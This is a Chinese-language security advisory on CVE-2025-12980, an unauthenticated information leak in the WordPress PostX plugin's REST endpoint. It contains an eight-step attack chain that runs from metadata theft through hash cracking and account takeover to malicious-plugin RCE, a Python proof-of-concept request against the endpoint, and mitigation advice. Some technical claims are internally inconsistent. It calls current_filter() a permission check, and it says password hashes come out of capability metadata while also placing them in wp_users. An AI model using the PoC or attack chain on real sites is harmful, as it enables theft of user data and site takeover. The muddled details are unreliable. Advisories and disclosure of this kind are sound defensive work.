CVE-2025-12980 WordPress PostX插件未授权信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-12980

漏洞类型

未授权访问/信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX (WordPress插件)

漏洞概述

CVE-2025-12980是WordPress插件PostX中的一个严重安全漏洞。该插件是一款流行的Gutenberg块编辑器插件，用于创建新闻、杂志和博客网站。漏洞源于插件的REST API端点缺少适当的权限验证机制。具体来说，'/ultp/v2/get_dynamic_content/' API端点未对用户权限进行有效检查，导致任何未经身份验证的攻击者都可以通过发送特制请求来访问该端点。攻击者利用此漏洞可以获取WordPress网站用户的敏感元数据信息，包括用户密码哈希、邮箱地址、个人资料信息等高价值数据。由于CVSS评分达到7.5（高危），且该插件被广泛使用于各类WordPress网站，此漏洞对互联网安全构成显著威胁。未经身份验证即可利用此漏洞的特性，大大降低了攻击门槛，使得自动化大规模扫描和利用成为可能。

技术细节

PostX插件在实现REST API功能时，存在典型的缺少授权检查漏洞（Missing Authorization）。插件注册了'/ultp/v2/get_dynamic_content/'路由来处理动态内容请求，但该端点的回调函数直接处理请求而未调用current_filter()或current_user_can()等权限验证函数。攻击者只需构造一个带有适当参数的HTTP GET请求即可触发漏洞利用。由于WordPress的REST API默认允许未认证用户访问部分端点，且插件开发者未遵循最小权限原则进行二次验证，导致敏感用户数据被暴露。攻击过程中，攻击者通过遍历用户ID或利用其他信息获取手段，发送API请求获取用户元数据。返回的数据中包含wp_capabilities、wp_user_level等关键字段，这些字段与用户密码哈希（存储在wp_users表中）相关联。攻击者可进一步利用这些信息进行密码破解或横向移动攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和PostX插件版本，确认插件版本<=5.0.3

STEP 2

步骤2: 漏洞探测

攻击者访问/wp-json/ultp/v2/路由，确认脆弱的get_dynamic_content端点存在且可访问

STEP 3

步骤3: 构造恶意请求

攻击者构造针对/ultp/v2/get_dynamic_content/端点的HTTP GET请求，无需携带认证令牌

STEP 4

步骤4: 数据窃取

通过API响应获取用户元数据，包括wp_capabilities、wp_user_level等敏感字段

STEP 5

步骤5: 密码哈希提取

从获取的元数据中提取用户密码哈希（存储在wp_users表的user_pass字段）

STEP 6

步骤6: 密码破解

使用彩虹表或暴力破解工具对获取的密码哈希进行离线破解

STEP 7

步骤7: 账户接管

使用破解的凭证登录WordPress后台，获取管理员权限

STEP 8

步骤8: 持久化控制

上传恶意插件或修改主题文件，实现远程代码执行(RCE)

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-12980 PoC - PostX Plugin Unauthorized User Metadata Access
# Target: WordPress site with PostX plugin <= 5.0.3

def exploit_postx_cve_2025_12980(target_url):
    """
    Exploit for CVE-2025-12980: PostX plugin missing authorization
    on /ultp/v2/get_dynamic_content/ REST API endpoint
    """
    # API endpoint path
    endpoint = "/wp-json/ultp/v2/get_dynamic_content/"
    
    # Construct full URL
    url = target_url.rstrip('/') + endpoint
    
    print(f"[*] Targeting: {url}")
    print(f"[*] Exploiting CVE-2025-12980...")
    
    try:
        # Send unauthenticated request to the vulnerable endpoint
        # The endpoint should return user metadata without authentication
        response = requests.get(url, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            data = response.json()
            print(f"[+] SUCCESS: Retrieved sensitive data")
            print(f"[+] Response: {json.dumps(data, indent=2)}")
            
            # Check for password hashes or sensitive metadata
            if 'data' in data or 'user_meta' in data:
                print("[!] VULNERABLE: User metadata exposed including password hashes")
                return True
        elif response.status_code == 401:
            print("[-] Not vulnerable or already patched")
        else:
            print(f"[*] Unexpected response: {response.text}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    
    return False

# Usage example
if __name__ == "__main__":
    # Replace with target URL
    target = "https://example-wordpress-site.com"
    exploit_postx_cve_2025_12980(target)

影响范围

PostX插件所有版本 <= 5.0.3

防御指南

临时缓解措施

由于该漏洞无需认证即可利用，建议立即采取以下临时缓解措施：1) 在Web服务器层面（如Nginx/Apache）添加规则，禁止未授权用户访问/wp-json/ultp/路径；2) 使用WordPress安全插件（如Wordfence）进行临时防护；3) 临时禁用PostX插件直到完成升级；4) 强制所有用户使用强密码并启用双因素认证；5) 监控访问日志，查找对/ultp/v2/端点的异常请求模式。最佳解决方案是尽快将PostX插件升级到5.0.4或更高版本，该版本已添加必要的权限检查修复。